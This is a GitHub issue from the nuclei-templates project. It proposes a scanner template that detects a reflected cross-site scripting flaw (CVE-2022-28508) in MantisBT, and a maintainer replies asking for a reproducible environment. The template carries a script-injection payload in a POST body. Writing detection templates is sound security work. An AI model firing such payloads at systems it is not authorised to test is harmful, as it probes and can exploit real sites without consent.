projectdiscovery / nuclei-templates

Community curated list of templates for the nuclei engine to find security vulnerabilities.

Home Page:https://github.com/projectdiscovery/nuclei

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

CVE-2022-28508

akincibor opened this issue · comments

id: CVE-2022-28508

info:
  name: MantisBT < 2.25.2 - Reflected Cross-Site Scripting
  author: Akincibor
  severity: medium
  description: An XSS issue was discovered in browser_search_plugin.php in MantisBT before 2.25.2. Unescaped output of the return parameter allows an attacker to inject code into a hidden input field.
  reference:
    - https://github.com/YavuzSahbaz/CVE-2022-28508/blob/main/MantisBT%202.25.2%20XSS%20vulnurability
  tags: xss

requests:
  - method: POST
    path:
      - "{{BaseURL}}/man/browser_search_plugin.php"

    body: |
      type=text'"()%26%25<acx><ScRiPt%20>N8Zn(9266)</ScRiPt>
    headers:
      Content-Type: "application/x-www-form-urlencoded"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"()&acx><script>n8zn(9266)</script>'

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200

Hi @akincibor, The response time to this Issue was much longer than usual. We were unable to set up a vulnerable environment for this CVE, so this PR has been put on hold. We would appreciate it if someone could provide us with the debug data or steps to set up a vulnerable environment. We would need to add an additional matcher in order to prevent False Positive results.

Also, Feel free to join the discord server if you have more info that you can share directly over DM.